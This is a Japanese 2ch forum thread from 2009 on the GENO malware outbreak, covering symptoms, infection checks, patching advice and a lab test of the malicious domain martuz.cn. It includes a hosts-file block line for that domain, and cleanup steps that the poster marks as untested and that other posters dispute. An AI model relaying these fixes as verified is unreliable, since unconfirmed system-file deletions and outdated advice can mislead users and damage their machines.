GENOウイルススレ 感染4台目
at INTERNET
1:192.168.0.774
09/05/23 12:42:46 Hx9+/5Qd0
★対処法(GENOウイルスチェッカーのサイトから引用)
■ adobe readerを9.1.1にアップデートする(9.1:9.1.0では駄目)
(9.1.0)
URLリンク(ardownload.adobe.com)
(9.1.1↑,をインストールしてから↓を適用)
URLリンク(ardownload.adobe.com)
バージョン情報はadobe readerを起動してヘルプ→adobe reader ?についてで表示されます
■ adobe javascriptをオフに
adobe readerを開いて メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す
■ adobe flashplayerを最新版に更新
URLリンク(fpdownload.macromedia.com)
■ FirefoxにてNoscriptを利用
(Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
(sleipnir、IEでも上手に設定するとなんとかなりますが、難しいです。)
swfのロード、pdfの関連づけ、activeXの無効化がきちんと出来れば問題ないが、IEコンポーネント利用ブラウザでは難しい
そのアタリが比較的楽に設定できるOperaはお勧め
■ hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
hostsファイルの在処
Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
Windows 2000の場合→「C:\WINNT\system32\drivers\etc」
Windows 95/98/MEの場合→「C:\Windows」
■ Vistaの人ははUACをONにする
★GENOウイルスチェッカー、GENOウイルスまとめ
URLリンク(geno.2ch.tc)
★前スレ
GENOウイルススレ 感染3台目
スレリンク(internet板)
2:192.168.0.774
09/05/23 12:44:46 Hx9+/5Qd0
★症状
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
★Anubisレポート
URLリンク(anubis.iseclab.org)
★感染確認方法
(現状(05/17)では感染が発覚したからといってどうにもできない、安心したい人用)
@regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとレジストリエディタが立ち上がらない。
■ 確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
Aavast!(無料のアンチウイルスソフト)で確認
Bsqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
★感染した場合
(当方、この対処法について全く確認していません。自己責任でお願いします。)
1.C:\WINDOWS\Prefetch 内を全部削除
2.[Windowsキー] + [R] を押してファイル名を指定して実行で msconfig
3.スタートアップに何も書かれていない行があったのでチェックをOFF
4.再起動
5.C:\WINDOWS\System32\sqlsodbc.chm を削除 → 復活しないことを確認
6.正常なsqlsodbc.chmに差し替え
3:192.168.0.774
09/05/23 13:15:54 Sr+xO+q90
イチモツ
4:192.168.0.774
09/05/23 13:20:22 ta6edS2L0
まーたアフィの人がテンプレ変えたな
GENOウイルスチェッカー(アフィリエイトも充実)
URLリンク(geno.2ch.tc)← アフィリエイト(Amazon) ↓ソース
<iframe src="URLリンク(rcm-jp.amazon.co.jp)
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="URLリンク(rcm-jp.amazon.co.jp)
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="URLリンク(rcm-jp.amazon.co.jp)
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="URLリンク(rcm-jp.amazon.co.jp)
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
Jane使っている人は
ツール-設定-コマンドで
コマンド名 適当
実行するコマンドに URLリンク(geno.2ch.tc)
でjaneから検索でチェックできる
5:192.168.0.774
09/05/23 13:21:17 ta6edS2L0
>>1
対応済
Flash Player 9.0.159.0 10.0.22.87
Adobe Reader 7.1.1 8.1.4 9.1.0
最新
Flash Player 10.0.22.87
Adobe Reader 9.1.1
6:192.168.0.774
09/05/23 13:30:55 Hx9+/5Qd0
お、俺がチェッカーの管理人だって!?
俺はチェッカーに救われた一般人ですよ
7:192.168.0.774
09/05/23 13:32:50 ta6edS2L0
いやいやだからって何でテンプレ変えちゃうわけ?
そのテンプレ間違えだらけだし、チェッカーも初心者の不安煽るだけじゃん
チェッカー使った初心者が黒ですか白ですかって結局確認しにくるだろうが。
8:192.168.0.774
09/05/23 13:35:44 mqjRjq9C0
間違 え だらけ…
9:192.168.0.774
09/05/23 13:36:28 oHG73gbi0
>>7
馬鹿は黙ってろ
厨獄に帰れ
10:192.168.0.774
09/05/23 13:38:56 F81SI+Tt0
結局あのゴミチェッカーは混乱しか生まなかったしな
11:192.168.0.774
09/05/23 13:41:19 ta6edS2L0
>>8
どっちも正解ですが何か?
>>9
いやだから何でいきなりアフィのテンプレに変えちゃうわけ?
12:192.168.0.774
09/05/23 13:42:21 Hx9+/5Qd0
>>7
またまた君はそんな重箱隅なことを言うだろ
だいたい君、最新版で修正された脆弱性が他のサイトで攻撃されないっていう保証できるの?できないよね?
13:192.168.0.774
09/05/23 13:44:28 ta6edS2L0
>>12
ここはGENOスレな
URLリンク(www.adobe.com)
感染報告やら参照するのにどこでこの脆弱性が修正されたかは明確なほうがいいだろ
14:192.168.0.774
09/05/23 13:47:52 Sr+xO+q90
>>13
GENOウイルススレであろうがなんであろうが、初心者に優しい方がいいに決まってるだろうが
どこで脆弱性が修正されたかなんて一部の知識ある人が勝手に調べればいいだけだっつーの
だいたいそういう知識あるヤツは感染もしないし、アップデートもちゃんとしてる
15:192.168.0.774
09/05/23 13:51:13 F81SI+Tt0
>>14
初心者に優しいスレを目指すなら間違えぐらい直すべき
16:192.168.0.774
09/05/23 13:53:42 soK/x83h0
/⌒ヽ
/ ´_ゝ`) お久しぶりですね、すいません、ちょっと ry
| /
| /| |
// | |
U .U
17:192.168.0.774
09/05/23 13:53:57 Hx9+/5Qd0
なんだよ
ID:F81SI+Tt0=ID:ta6edS2L0
かよww
必死ダナーwww
18:192.168.0.774
09/05/23 13:54:17 ta6edS2L0
初心者にやさしい対策テンプレが
・hosts追記
・js無効(火狐NoScript推奨)
ねーよ。それならreader更新だけでいいじゃん。
19:192.168.0.774
09/05/23 13:54:21 3BjN7uEa0
間違えの無いようにやっていきたいもんです
20:192.168.0.774
09/05/23 13:56:00 F81SI+Tt0
前スレのテンプレ書き直すか
21:192.168.0.774
09/05/23 13:56:01 ta6edS2L0
>>17
ID:Hx9+/5Qd0
ID:Sr+xO+q90
こうですか?わかりません><
反論出来ないからって、煽りはいいですから。
22:192.168.0.774
09/05/23 13:59:41 YL7Xpp0S0
なになに、昨日だかadobe reader6.0→9.1.0にして
安心してたけど9.1.1じゃないとダメなのかw
(9.1.0をインストールしてから↓を適用)
URLリンク(ardownload.adobe.com)
これはreader起動して「アップデートの有無をチェック」ではダメなのん?
23:192.168.0.774
09/05/23 14:00:21 ZVz/t1CW0
新スレいきなり荒れててワロタw
firefoxのNoScript、試したことない人は一度はやってみるのもいい鴨
ただ、だんだん我慢できなくなって外してしまう、遅かれ早かれw
前スレ>>854にチラっと出てたeval関数だけ止めるとかいうやつは
国産オミトロンみたいなもんという理解でいいと思われ
にしても初心者対応は難しいよね。要するに「明日も明後日も絶対安心な方法を教えて!」
って言ってるようなものだからなぁ。そんな方法があれば誰も苦労しませんよ、ないから
こうやって必死に毎日、最新の情報漁ってるというのに・・・
24:192.168.0.774
09/05/23 14:00:50 BPqsEeLX0
sqlsodbc.chmのサイズが1.29 KB (1,323 バイト)だったんだけど…
感染してたのかな。取りあえず削除して入れなおしました。
GENOウイルスチェッカーって信憑性あるの?
どこで感染したか調べたくて、その頃行ったサイト URLリンク(boox.jp)
をチェックしたら危険度106%って出たんだけど。
25:192.168.0.774
09/05/23 14:01:34 OPuerAms0
>>21
反論しないってことな自演してたんですね?
そんなモラルのない人は出て行ってください
26:192.168.0.774
09/05/23 14:02:54 ta6edS2L0
>>22
readerの脆弱性を突いたこのウイルス挙動は9.1.0で対策済
9.1.1へのアップデートは
>これはreader起動して「アップデートの有無をチェック」ではダメなのん?
それでいい
27:192.168.0.774
09/05/23 14:04:14 ta6edS2L0
>>25
意味がわかりません。
28:192.168.0.774
09/05/23 14:05:29 MMIDDv3r0
>>27
厨獄に帰れウジ虫
29:192.168.0.774
09/05/23 14:05:36 Sr+xO+q90
>>21
お前はなにを言っているんだ(AAry
>>18
hosts追記は現時点では無効だけど
noscriptに関しては、新たな脆弱性に対して有効だよね?
>>24
chmがどうたらこうたらはワカランけど
そこは大丈夫だよ
30:192.168.0.774
09/05/23 14:06:46 C376xCRT0
>>24
そこは違うっぽい
そこ以外で感染したサイトを踏んでる
クロなのでOSいれなおしてください
31:192.168.0.774
09/05/23 14:07:21 ZVz/t1CW0
>>1
> URLリンク(ardownload.adobe.com)
> (9.1.1↑,をインストールしてから↓を適用)
今は最初から9.1.1でインストールされる筈 まぁ画面見てればわかるが
32:192.168.0.774
09/05/23 14:08:57 Hx9+/5Qd0
>>27
自演してないなら
意味が分かりませんって返答はないよねww
>>31
mjd?
管理人さんにメールしとくわ
サンクス
33:192.168.0.774
09/05/23 14:09:45 BPqsEeLX0
>>29-30
ありがとう。ここじゃないのか。
CD-ROMがないからOS入れなおせないんだ・・・。
34:192.168.0.774
09/05/23 14:10:18 DahySqY8O
このスレもとうとう消費期限が切れたか…
35:192.168.0.774
09/05/23 14:10:37 jkLej88t0
ID:oHG73gbi0
ID:OPuerAms0
ID:MMIDDv3r0
単発
36:192.168.0.774
09/05/23 14:12:01 OPuerAms0
>>33
>>2の★感染した場合やってみたら?
37:192.168.0.774
09/05/23 14:12:10 jkLej88t0
ID:Hx9+/5Qd0
38:192.168.0.774
09/05/23 14:13:47 YL7Xpp0S0
>>26,31
ありがとう。今アップデートで9.1.1になった。
何か分からないけど昨日9.1をインストールした時点では
verは9.1.0だったんだけど、これでも対策済だったのか。。
39:192.168.0.774
09/05/23 14:19:03 BPqsEeLX0
>>36
★感染した場合やってみた。あとAdobeも最新版にした。
これだけやってれば大丈夫かな?
40:192.168.0.774
09/05/23 14:19:17 jkLej88t0
URLリンク(www3.atword.jp)
全撃墜してるのは
AhnLab-V3
AntiVir
AVG
Kaspersky
McAfee-GW-Edition
Microsoft
NOD
Rising
Symantec
avast!でもいいの?
41:192.168.0.774
09/05/23 14:22:32 0Xu3vLQ/0
>>40
今日の日付確認しろw
42:192.168.0.774
09/05/23 14:35:44 F81SI+Tt0
うわーテンプレ書き直そうと思ったけど前のテンプレも結構微妙だー
sqlsodbc.chmのサイズに頼るんじゃなくてレジストリの内容見た方が確実
だと思うんだけどやっぱ初心者向けじゃないか
43:192.168.0.774
09/05/23 14:36:34 C376xCRT0
>>39
こっちも見てみて
駆除方法についてSymantecの説明
URLリンク(www.symantec.com)
ただ、今後のためにもリカバリディスクはあったほうがいいよ
メーカー製PCならHDD内にあるんじゃないのかな
取説みてくれ
44:192.168.0.774
09/05/23 15:00:55 BukbC16CP
対応してるアンチウィルスソフト一覧を貼って下さい
45:192.168.0.774
09/05/23 15:03:38 XxYYorp40
URLリンク(sexsyasin.exblog.jp)
46:192.168.0.774
09/05/23 15:04:20 BPqsEeLX0
>>43
ありがとう。システムの復元機能を無効にしておきました。
取説がOffice XPのしか見当たらないのですが、なんとかリカバリディスクを探してみます。
47:192.168.0.774
09/05/23 15:15:04 MMIDDv3r0
(・∀・)ニヤニヤ
48:192.168.0.774
09/05/23 15:15:46 imZ1efiC0
>>44
1種類じゃなく、何種類も日替わりで出まわっているので、そんな一覧作成できない。
検出可否報告スレを見る限りでは、かなりのベンダーが対応を始めているようだが
完璧に対応していて除去までおっけーなところを聞かれてもわからない。
本体検出の能力と、除去能力は別のものだから。
49:192.168.0.774
09/05/23 15:22:23 F81SI+Tt0
出回ってたの4日も前の話ですよ
50:192.168.0.774
09/05/23 15:22:55 1RJPI6/M0
前スレの984で
-------------
984 名前:192.168.0.774[sage] 投稿日:2009/05/23(土) 09:31:48 ID:Ci5k0h8A0 (PC)
あと、6時間前に立った セキュリティー板のテンプレに
■ポート135を閉じる
■ポート445を閉じる
ってあるんだが、止めさせて方がいいと思うんだが、どうだろう?
-------------------
と書いたんだけど、コメントくれた人。
なかなかレスできなくてごめん。ありがとう。
さっきまで感染疑いの奴と電話で話してたんだが、
確認ステップの途中で「まだあるの〜はぁー」なんてため息つかれちまった。 なんだこの怒り。
/////////
ポート135と445を止める為にサービスを停止するTipsはあっちのスレのテンプレから外した方が良さそうって
のがこっちのスレの意見ってことでOKかな?
だが、検索すると脆弱性情報とか危険なポートなので塞いだ方がいいっていうスタンスのサイトばかりで、
サービスの停止にする事によってポートを塞ぐことによる弊害を説明するのが大変そうだな。
「さっきのスレの最後の方を読んでくれ」だと、こっちに人が増えてマズイか?
>>43
これでも危険度低に分類されるんだね。 じゃあ高ってどんなのだよと思ったが、
ゼロデイじゃないし感染する為の必要条件も複数あるし、攻撃サイトは消えたしなぁ。
51:192.168.0.774
09/05/23 15:31:08 0Xu3vLQ/0
>>50
ちうかRPC停止云々をテンプレから外したほうが〜って話はテンプレに組み込まれた時から言われてたのよw
でもその時は流れ速くてスレ立て人が気付いて無かったり、荒らしがスレ立ててわざと旧テンプレ書いたり
んな流れで残ってるだけ
Port135も445も塞いだほうが良いのは確かだが、GENOにゃ関係無いしテンプレに含まなくても良い(現状ならね)
そしてRPC停止は影響度が高い(依存関係が大量で初心者ほどやっちゃいかん行為)ので正直書いた奴出て来いって感じw
52:192.168.0.774
09/05/23 15:35:41 h8voSB2Y0
rpcssは止めるに止められない【サービス】。
135,445は、外からは入らないようにする【ポート】。
GENO系ウイルスは関連してないが、こっから入られるウイルスは多いので、
巻き添えで話題になってる。関係ないけど、これを機会になんとかしとけ。
53:192.168.0.774
09/05/23 15:37:58 BZCm21Hn0
前スレの結論としてはアドビリーダーを7〜9で更新していれば良かったんじゃないかな
他にアンチウイルスソフトを変えたり、ブラウザのジャバを切ったりするのは確か意味無かったと思う
54:192.168.0.774
09/05/23 15:43:42 BZCm21Hn0
↑アドビリーダーの脆弱性を突いたウイルスだから
それが機能しなかったら他の事をやってみ意味が無いという意味ね
55:192.168.0.774
09/05/23 16:02:04 h8voSB2Y0
Javaを切る: 特に数年前は、他のウイルスをよけるのに意味があったが、今回ウイルスには無効。
JavaScriptを切る: 効果があるが、見られないサイトがかなり出てくる悪感で、対初心者には非現実案。
56:192.168.0.774
09/05/23 16:16:30 BZCm21Hn0
まあいいや、おまいらはご丁寧にウィンドウズの更新も出来なくするような間抜けだから
過剰防壁でも備えたまへ
57:192.168.0.774
09/05/23 16:18:45 1RJPI6/M0
>>52-53
ジャバじゃなくてJavaScriptね。
心配してくれてありがとう。
だが、自分のは、しっかりやってるから大丈夫。
じゃあ、あっちのスレに書いてくるわ。
58:192.168.0.774
09/05/23 16:29:33 4+szvDMsP
>>56
分かっててやってるんだろ、それを言ったら2k/XP以外はそもそも関係ないし
個人的には JavaScript の切り方とかいろいろ試すってのはいい事だと思うぞ
59:192.168.0.774
09/05/23 16:29:35 FQnBqUEn0
チラ裏メモ
■ Adobe Flash Player
Adobe Flash Player のバージョンテスト
URLリンク(www.adobe.com)
ブラウザ上でアクティブになっている Flash Player と、
最新のバージョンを確認できる。
この書き込み時の最新バージョン : 10,0,22,87
■ Adobe Reader
Adobe Reader のバージョン確認方法
Adobe Reader の[ヘルプ]メニュー→[Adobe Reader X について]
この書き込み時の最新バージョン : 9,1,1
60:192.168.0.774
09/05/23 17:27:28 M+Ygu9WD0
Adobe Readerなんて入れなきゃいいだけでしょ
61:192.168.0.774
09/05/23 17:29:00 jkLej88t0
セキュ板19もアフィのチェッカーのテンプレに書き換えられてるのね
62:192.168.0.774
09/05/23 17:40:34 O9Ovf6/e0
>>60
けだし正解である。
63:192.168.0.774
09/05/23 17:44:20 a8bSNZSK0
>>60
フラッシュもね。
64:192.168.0.774
09/05/23 17:46:07 FMuei+100
>>50
それらのポートは外部に対して閉じておけばいい話で、LAN内で
閉じる必要はない。
ブロードバンド回線を使っているのならルータがあるだろうから、
ルータで閉じておけばいいし、モバイルの場合はFWアプリで
ブロックすればいい。
いずれにしろ、サービスレベルで止めてしまうのは無茶だし、
そもそもGENOに直接関係しているものでもない。
セキュリティ一般の基本みたいなもんだから、テンプレには
必要ないでしょ。
65:192.168.0.774
09/05/23 17:59:00 1RJPI6/M0
>>64
もう書いちまったあとだけど、後押しthx。
>>59
そこ、下の黒文字(現在の Flash Player バージョン)よりも、
テスト結果の赤文字の方が新しいってことあるよ。
つまり、現在の最新バージョンの更新タイミングがめちゃくちゃ遅い(1ヶ月放っておかれるなんてざら)。
はじめは偽サイトかと思って焦ったほどだ。
JRE とかのJavaもだけど、英語サイトで確認するか、その補足程度に使うのがお奨め。
Security bulletins and advisories
URLリンク(www.adobe.com)
66:192.168.0.774
09/05/23 18:30:14 imZ1efiC0
>>61
うむ、アフィチェッカーは、テンプレから外すべきだろう。混乱を招いている上に、テンプレ改変とか、いらんことしかしない。
67:192.168.0.774
09/05/23 18:33:24 Sz6n7xWm0
やべえサブ機感染したかも
文字勝手に打ちまくって制御不能
68:192.168.0.774
09/05/23 18:41:44 5P+JCV3b0
>>67
横で猫がキーボードを踏んでないか見るんだ
69:192.168.0.774
09/05/23 18:47:10 Sz6n7xWm0
>>68
ヘッドフォンがキー押してただけだったわ、すまん。
70:192.168.0.774
09/05/23 18:48:10 IKhyILDB0
>>67-69
笑ったwww
71:192.168.0.774
09/05/23 19:07:35 3BjN7uEa0
おいww
72:192.168.0.774
09/05/23 19:13:06 sQU+1gs30
和んだw
73:192.168.0.774
09/05/23 19:39:42 c4WG3X5q0
>>67-69
不覚にも
74:192.168.0.774
09/05/23 19:41:34 OA8HLuhR0
>>69
俺も似たような経験あるw
あせるよなw
75:192.168.0.774
09/05/23 19:54:11 a/bRTiGj0
>>67-69
なぜ13分もかかったw
76:192.168.0.774
09/05/23 19:56:05 imZ1efiC0
>>67-69
和ませるなw
77:192.168.0.774
09/05/23 20:18:28 kR9G4T450
今は小休止状態みたいなので質問させていただきたいのですが、先週木曜日に初めて
GENOウイルスのことを知ったときに、Adobe関係は全部アンインストールいたしました。
と思っていたのですが後で、もう一度、プログラム一覧を見直したところ、
Korean Fonts Support For Adobe Reader8.1.0というのが残っていました。
どうやら一連のAdobe製品と離れた位置に在ったので見落としていたようです。
そのときは速攻アンインストールしたのですが、後で気になってググってみても、
検索結果は 外国語のページのものが多く、直接Adobeのサイトにも行きましたが、
もう一つ、はっきりとした記述がありません。
私がフォントファイルの意味を もう一つ はっきりと理解していないせいもありますが、
まあアジア拡張言語フォントパックの中の一つらしい というぐらいは分かりました。
そこで、もう一度ダウンロードして、起動させるなりプロパティを見るなりして
正体を確かめようとしたのですが、今度は、(以下、テキトー訳)
このインストールには あなたのシステム上にインストールされたAdobe Reader8.1.0が必要です。
このインストーラーを起動する前に、Adobe Reader8.1.0をインストールしてください
みたいな表示が出て、インストールできません。
これは、いわゆる言語パッチといわれる類のものなのでしょうか? もし、
そうなら放っておいても、単独で起動することはないでしょうから安心ですが……。
そういえば、ファイルサイズも、3.9メガバイトと小さかったように思います。
長文になってしまい、スミマセン。さんざん既出の質問なら、
チラシの裏、乙 で捨て置かれて結構です。
78:192.168.0.774
09/05/23 20:35:03 C376xCRT0
>>77
なんでそこまで長文になったのかわからんけど
Korean Fonts Support For Adobe Reader8.1.0
これはフォントの追加パッケージみたいなもんだとおもう
アンインストールしたならそれで問題ないです
インストールする必要はありません
あとプログラムの追加と削除には出ないIE用FlashPlayerは残ってると思います
URLリンク(www.adobe.com)
ここでバージョンを確認して最新版をいれてください
79:192.168.0.774
09/05/23 20:41:58 GyZU8Yee0
延々とブルスクが繰り返されるようになって起動しなくなってしまった・・・
もうこの状態になったらどうすればいいのかさっぱりだ
クリーンインストールは無理なのかな?
80:192.168.0.774
09/05/23 20:47:19 F81SI+Tt0
セーフモードでも起動しないならクリーンインストール
81:192.168.0.774
09/05/23 22:00:43 hutaJPqN0
>>79
救出したいデータがあるなら
Puppy等でデータ待避
82:192.168.0.774
09/05/23 22:30:15 C376xCRT0
>>79
クリーンインストールはできるよ
83:192.168.0.774
09/05/23 23:21:47 BukbC16CP
感染したらバックアップソフトで復元すれば大丈夫かな?
84:192.168.0.774
09/05/24 00:47:38 Ai80SDN30
GhostやTrue Imageのような丸々復元するソフトなら大丈夫。
85:192.168.0.774
09/05/24 01:02:36 r2Cbq1zZ0
>>78
うち(XPSP3 FlashPlayer 10)では、プログラムの追加と削除に
adobe Flash Player 10 AcriveX として出るけどな。
まぁ、サイトで確認するのはいいことだと思うけど。
>>83
True ImageのスレッドでSystem Volume Infomation やバックアップの暗号化について訊いている人がいたな。
まぁ、外付けHDDとかに退避した方がより、安全だとは思うけど。
>>81
Puppyって知らなかった。
86:192.168.0.774
09/05/24 01:07:19 heAsx668P
俺も外付けにTrue Imageでバックアップしてるよ
87:192.168.0.774
09/05/24 01:47:33 aJuP8TRJ0
>>78さん、残っていました。アドオンの中に、flash shockwaveが。
いろいろ確認したので、返事が遅くなって、すみません。
アンインストールするときに、確か Firefox用アドオンとIF用プラグインを削除します
とか出たので、自分では残っていないつもりでした。
これは、昔から、スレにいる人には、割と周知の事実なんでしょうか?
もしかしたら最近のスレでも話題に登っていたのかもしれませんが、割と聞き逃していました。
お恥ずかしい限りです。IE7の場合(8と6は未使用のため)「ツール」→「アドオンの管理」→「アドオンの有効と無効」→デフォルトの「現在 Internet Explper で読み込まれて
いるアドオン」で探したときには見つからなくて、他の方法で確認しようとしましたが、
後で入っているのに気がついてからアドオンの有効と無効を見たら、「許可なしで実行される
アドオン」とか他の項目のところには、ちゃんと表示されていました。
まとめも、ざっとですが見にいってきましたが、ちょっと どこに書いてあるか確認できませんでした。
>>なんでそこまで長文になったのかわからんけど
すみません。きっと説明厨で、長文虫なんでしょうね。
聞きたかったのは、簡単に言うと、Kor
88:192.168.0.774
09/05/24 01:52:26 aJuP8TRJ0
>>なんでそこまで長文になったのかわからんけど
すみません。きっと、説明厨で、長文虫なんでしょうね。
聞きたかったのは、簡単に言うと、Koreanなんちゃらを 自分と同じように
アンインストール派の人で 消し忘れてる人いるだろうけど、これって無害なの?
ってことです。でも、Flash・Shockwaveのほうが、よっぽど恐ろしかったです。
これは、やっぱりアップデート派の人の
ほうが正解かな??
なんで途中で消えたんだろう。あっ、書き込み完了する前に、
タブ移動したからかな。
89:192.168.0.774
09/05/24 02:07:23 2VJlz39B0
>>88
なんか、勘違いしているようだけど、ShockwaveはFlashplayerとは違うよ。
Shockwaveは2006年の2月のが最新
URLリンク(www.adobe.com)
Adobe Shockwave と Flash Playerのテスト
URLリンク(www.adobe.com)
ここで両方をテストできる。
Shockwaveなんてなくて困らないから、アンインストールしたままがいいだろうけどね。
90:192.168.0.774
09/05/24 02:11:49 dPjaiBoy0
2ch的には収束に向かってるの?
91:192.168.0.774
09/05/24 02:17:06 2b1ExXhKP
Flash Playerが9.0.124.0以上でAdobe Readerが9.1以上なら感染しない
収束しないほうがおかしいだろ
92:192.168.0.774
09/05/24 02:17:24 oOp80I+s0
新ネタ待ち。GENO系の次が出てくるか、別のウイルスが話題になるかはわからない
不安な人は引き続き不安、困ってる人は引き続き困ってるので、解決したってわけじゃない
93:192.168.0.774
09/05/24 02:22:29 HFhRBZx00
USCERTやセキュリティ企業が動き始めた段階でサーバ停止
もう十分な量のボットは確保しただろうし後は儲けるだけなんじゃねえの
94:192.168.0.774
09/05/24 02:23:15 Q8xZKwGm0
感染しても顕著な症状がでないので気付いてない人も多いし。
95:192.168.0.774
09/05/24 02:32:01 jcHTZiwS0
>>4
このウィルスチェッカー置いてるトコが感染する事ないの?
96:192.168.0.774
09/05/24 02:40:08 332mANDn0
Puppyってあるんだな。
試してみようかなー。
97:192.168.0.774
09/05/24 06:37:27 uAVXuYQE0
今頃になって感染するって、どこから拾ってきてんだよ
亜種がどうなるかは知らんけど、
使われてたのは3月に塞がれた穴だったらしいな
なんかもう、感染した奴乙としか言いようがない。
98:192.168.0.774
09/05/24 07:49:59 aJuP8TRJ0
>>89、すみません。呼び名も意味も、全部、間違ってました。
Shockwave Flashは、Flash Playaerの子供みたいなものかと思っていたのですが、
Shockwave Flash は、ActiveXコントロール系だったのですね。まだ、よく分かってませんが。
なんスレか前でスレの皆さんが話してたはずなのに、失念してました。
大手動画サイトが古いバージョンのFlash Playerを勝手に呼び出すと、
どなたかが話してたの思い出して、確かめに回った後だったのに。
ようつべ、にこ動、やふー動画は、ちゃんとFlash Playerが
古いバージョンもしくは入っていません と警告してくれましたよ。
Googleは微妙、いきなりインスコしろ、言ってきた。
99:192.168.0.774
09/05/24 08:31:42 oOp80I+s0
>>95
あらゆる可能性は、ある。ただし、そんな、今注目されてるところが感染したら、
だーれも気づかない(スレで誰も言及してない)ことなんてありえない。ってこと
100:192.168.0.774
09/05/24 08:56:50 GCI88weB0
これホント?
>212 ユキワリコザクラ(関東地方) [] 2009/05/23(土) 22:39:52.90 ID:6wvDjucY
>
>XPユーザー、慌てるな
>GENOってVistaの場合、UACが有効なら大丈夫
>であれば、XPの場合、常に非管理者権限で使用してれば感染しないぞ
>パワーユーザーに権限を落とせ(必要時のみadminで運用)
101:192.168.0.774
09/05/24 09:10:20 h/uTUbue0
>>100
思いっきりガセ
102:192.168.0.774
09/05/24 10:01:48 O1GwBAYN0
>>100
「制限付きアカウントで使用」ならホント
103:192.168.0.774
09/05/24 10:08:59 oOp80I+s0 BE:2120544588-2BP(0)
砂箱で実験したとき、Drivers32に書き込めないと失敗することがわかってる
ここへの書き込みは、通常Administrators以上なので、たぶんそうなんだろう
VMで実験した人の確定情報待ち
104:192.168.0.774
09/05/24 10:35:59 O1GwBAYN0
VMじゃないが、実験用に仕立てた実機でmartuz.cn を試した。
汚染サイトに接続すると
Temporary Internet Filesへ侵入→martuz.cn からの本体ダウンロード→
ダウンロードしたウィルスの実行
までは成功するが、レジストリの書き換えと%Root%以下のフォルダへの
書き込みに失敗するので、最終的な感染までは進行しなかった。
XP-SP3の制限付きアカウントでの実験な。
Power Userでは未テスト。防げないような気がするが。
制限アカウントで防いだ後は、キャッシュを消すのを忘れるなよw
105:192.168.0.774
09/05/24 11:07:07 oOp80I+s0
よく考えたら、Power Users はXPHomeとかにはないので、やるならどのみちUsers以下か。
106:192.168.0.774
09/05/24 11:39:01 yKvhjVD20
>>105
Power UsersはWindowsフォルダへの書き込みもできるし、セキュリティ面では
あまり意味がないしね。
107:192.168.0.774
09/05/24 12:06:57 hqpRrEcb0
XPhomeにpowerUserあるよ
control userpasswords2からなら変えられる
まぁ、>>106の言うとおりで意味ないけどな
108:192.168.0.774
09/05/24 12:14:57 1zACvPr80
力のあるユーザーか。
109:192.168.0.774
09/05/24 12:27:23 tFlhttKu0
カスペのスキャンで悪意が存在するプログラムkeyloggerが検出されたんですが
これはGENOでしょうか。
110:192.168.0.774
09/05/24 12:28:13 WEGukwsK0
それだけではカスペ使ってる人じゃないと分からないと思うので
エスパーが来るまで待って下さい
111:192.168.0.774
09/05/24 12:31:32 tFlhttKu0
>>110
レスありがとうございます。
待たせてもらいます。
112:192.168.0.774
09/05/24 12:49:40 VjMCeEMy0
だめだこりゃ
113:192.168.0.774
09/05/24 13:32:18 ufM6MerJ0
.
114:192.168.0.774
09/05/24 13:37:38 h/uTUbue0
>>111
皮肉言われてるのに気付いてくれ。おとといきやがれといっしょ。
キーロガーというだけでは、GENOのスクリプトが落としてきたもののバリエーションの1つの可能性も
無関係のどこかで拾ってきたものの可能性もある。ゲーム等で、自前の内容にDinputを置き換えるような奴が、
キーロガーとして検知されることもあるし
エスパーでなければ回答できない。誰も回答できないから諦めろ。
どうしても回答が欲しければ、カスペのスレで、検出名と検出されたファイル名、踏んだ心当たりを正確に
書いて質問すればいい。とにかくここでは、回答貰えません。出直しなさい。
>>112
(゜゜)(。。)うんうん
115:192.168.0.774
09/05/24 13:40:05 tFlhttKu0
>>114
すみませんでした。
116:192.168.0.774
09/05/24 15:23:22 2W8NCPrM0
誘導
【Anti Virus】Kaspersky Lab Part83【カスペルスキー】
スレリンク(sec板)
117:192.168.0.774
09/05/24 15:25:36 74FjqYRv0
>>114
優しいですね
118:192.168.0.774
09/05/24 18:18:32 SX0zJqf70
Meだから安心
119:192.168.0.774
09/05/24 18:31:56 l6NMT+y60
ごしゅじんさまにあえて、えむいはしあわs…
120:192.168.0.774
09/05/24 19:46:13 CuuFY58N0
やめろおおおお
121:192.168.0.774
09/05/24 19:48:55 INl1BLTo0
やめて涙出るからやめて
Me使ったことないけど泣けるからw
122:192.168.0.774
09/05/24 20:32:50 DbyLrNnz0
Meたん使いの俺号泣
123:192.168.0.774
09/05/24 21:27:10 gNsaRzby0
時代が進めばそのうち
ごしゅじんさまにあえて、えっくすぴーはしあわs…
になる時が来るのか
124:192.168.0.774
09/05/24 21:29:55 oOp80I+s0
たぶん、【32bit】まだまだXPを使い続けるスレ 13GB【CD-ROM】とかいうスレが立ってるw
125:192.168.0.774
